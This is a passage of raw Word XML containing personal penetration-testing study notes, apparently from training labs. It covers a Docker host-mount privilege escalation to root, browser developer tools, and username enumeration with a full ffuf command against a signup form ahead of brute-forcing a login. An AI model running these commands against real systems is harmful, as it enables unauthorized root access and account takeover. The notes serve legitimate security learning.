    <w:p w14:paraId="393D7BD3" w14:textId="5683063D" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>in separate terminal tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B932B52" w14:textId="42C048BF" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>docker -H 127.0.0.1:2375 version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B3AFFC" w14:textId="229CD100" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>confirm ssh forwarding successful via enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E59990" w14:textId="750AB2B8" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>export DOCKER_HOST=”tcp://127.0.0.1:2375”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CD24D1" w14:textId="16AC27B9" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Fast PrivEsc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C9150" w14:textId="0F512B55" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>input Fast Docker PrivEsc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8108E" w14:textId="1CF5543D" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change ubuntu to proper image name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAD739E" w14:textId="5CD7AC55" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>docker run -it -v /:/host/ alpine chroot /host/ bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FB2D8B" w14:textId="6D3B67F9" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B109E11" w14:textId="71A82DCE" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF233EA" w14:textId="4D21A230" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57F923" w14:textId="2710051D" w:rsidR="007665F6" w:rsidRDefault="007665F6" w:rsidP="007665F6">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5F0318" w14:textId="661FE1BB" w:rsidR="007665F6" w:rsidRDefault="00391548" w:rsidP="007665F6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Walking A Web Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7023A4B6" w14:textId="367E2DF7" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08432EEF" w14:textId="77777777" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    View Source - Use your browser to view the human-readable source code of a website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C4B29" w14:textId="77777777" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Inspector - Learn how to inspect page elements and make changes to view usually blocked content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198C308D" w14:textId="77777777" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Debugger - Inspect and control the flow of a page's JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B6221E" w14:textId="596004BA" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Network - See all the network requests a page makes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A22C96" w14:textId="083E5A3B" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploring The Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B183856" w14:textId="77E7F459" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00391548">
        <w:t>manually reviewing the website's JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1895FC2F" w14:textId="5D64BCBB" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00391548">
        <w:t>exploring the website and noting down the individual pages/areas/features with a summary for each one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA94ACA" w14:textId="222DA152" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Viewing The Page Source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B928CEC" w14:textId="09445A34" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E453A69" w14:textId="7507FEE0" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>anchor tags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC9C1D9" w14:textId="2F31878B" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hidden links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A299A51" w14:textId="3FAD7BB8" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>asset directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D702B31" w14:textId="25B42DCC" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DA4E2" w14:textId="313EEBDB" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>patching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EAED06" w14:textId="4A8E792C" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>dates, versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CB72BC" w14:textId="33572ED9" w:rsidR="00391548" w:rsidRDefault="00391548" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Developer Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AD0191" w14:textId="3E4EF8E8" w:rsidR="00391548" w:rsidRDefault="00D07335" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Inspector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AFA303" w14:textId="3EEE8C7F" w:rsidR="00D07335" w:rsidRDefault="00D07335" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>edit and interact with page elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6090AD1D" w14:textId="1390080E" w:rsidR="00D07335" w:rsidRDefault="00D07335" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>js functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1791BAC9" w14:textId="1B4E0561" w:rsidR="00D07335" w:rsidRDefault="00D07335" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>div class options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B6E85F" w14:textId="1B311822" w:rsidR="00D07335" w:rsidRDefault="00D07335" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4577852D" w14:textId="0C3117B1" w:rsidR="00D07335" w:rsidRDefault="00D07335" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>JS code examination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52668B1C" w14:textId="475AD30C" w:rsidR="00D07335" w:rsidRDefault="00D07335" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Pretty Print option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025F42F0" w14:textId="052074F4" w:rsidR="00D07335" w:rsidRDefault="00D07335" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Click on numbered positions to insert breakpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDCF1D0" w14:textId="49336DE3" w:rsidR="00D07335" w:rsidRDefault="00D07335" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550B6E9C" w14:textId="621B3859" w:rsidR="00D07335" w:rsidRDefault="00442902" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Track external requests made by webpages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D991B" w14:textId="14601FB6" w:rsidR="00442902" w:rsidRDefault="00442902" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>AJAX submissions enable send/receive data in web application backgrounds without interfering by changing the current web page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AD4C67" w14:textId="49211CF3" w:rsidR="00442902" w:rsidRDefault="00442902" w:rsidP="00442902">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E603C6" w14:textId="787CC393" w:rsidR="00442902" w:rsidRDefault="00583298" w:rsidP="00442902">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6567D4C9" w14:textId="45DB3C2C" w:rsidR="00583298" w:rsidRDefault="00583298" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Username Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A0392F" w14:textId="0EA7C258" w:rsidR="00583298" w:rsidRDefault="00583298" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>User Account Creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D77605" w14:textId="59F78FCC" w:rsidR="00583298" w:rsidRDefault="00583298" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enter likely names, such as admin, to check if error messages confirm whether or not such an account already exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095466AB" w14:textId="4B48BA5B" w:rsidR="00583298" w:rsidRDefault="00583298" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use error message, exactly, to determine a list of valid pre-existing usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40221352" w14:textId="0B404028" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>FFUF tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE9E6EB" w14:textId="6059B6A8" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008C0DA9">
        <w:t xml:space="preserve">ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&amp;email=x&amp;password=x&amp;cpassword=x" -H "Content-Type: </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0DA9">
        <w:lastRenderedPageBreak/>
        <w:t>application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC144B6" w14:textId="06F70279" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-w – selects file location for username list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D268E9C" w14:textId="113F92ED" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-x – specifies the request method, either GET or POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF449AA" w14:textId="7757F3A6" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-d – specifies data going to be sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042B1E85" w14:textId="16FD7D82" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4AF03" w14:textId="66248599" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set to FUZZ to signify where the contents of the wordlists will be inserted in request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD0F8E6" w14:textId="5585749E" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD7A28B" w14:textId="5745460D" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179D4BF3" w14:textId="06BFA954" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CFABC6" w14:textId="54FAAABB" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-H – adds additional headers to request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F749838" w14:textId="7FD5DB51" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Type – to send form data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4BB97C" w14:textId="308AFA76" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-u – specifies URL making request to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB747E6" w14:textId="1340CDAF" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-mr – text on page user is looking for to validate usernames have been found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381F8033" w14:textId="568EA56D" w:rsidR="008C0DA9" w:rsidRDefault="007A6E65" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId259" w:history="1">
        <w:r w:rsidR="008C0DA9" w:rsidRPr="009D55D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/ffuf/ffuf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D6B7618" w14:textId="154C11E7" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257879D" w14:textId="00C2E30B" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use valid usernames to brute force attack on login page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8CBFE9" w14:textId="51F2336B" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
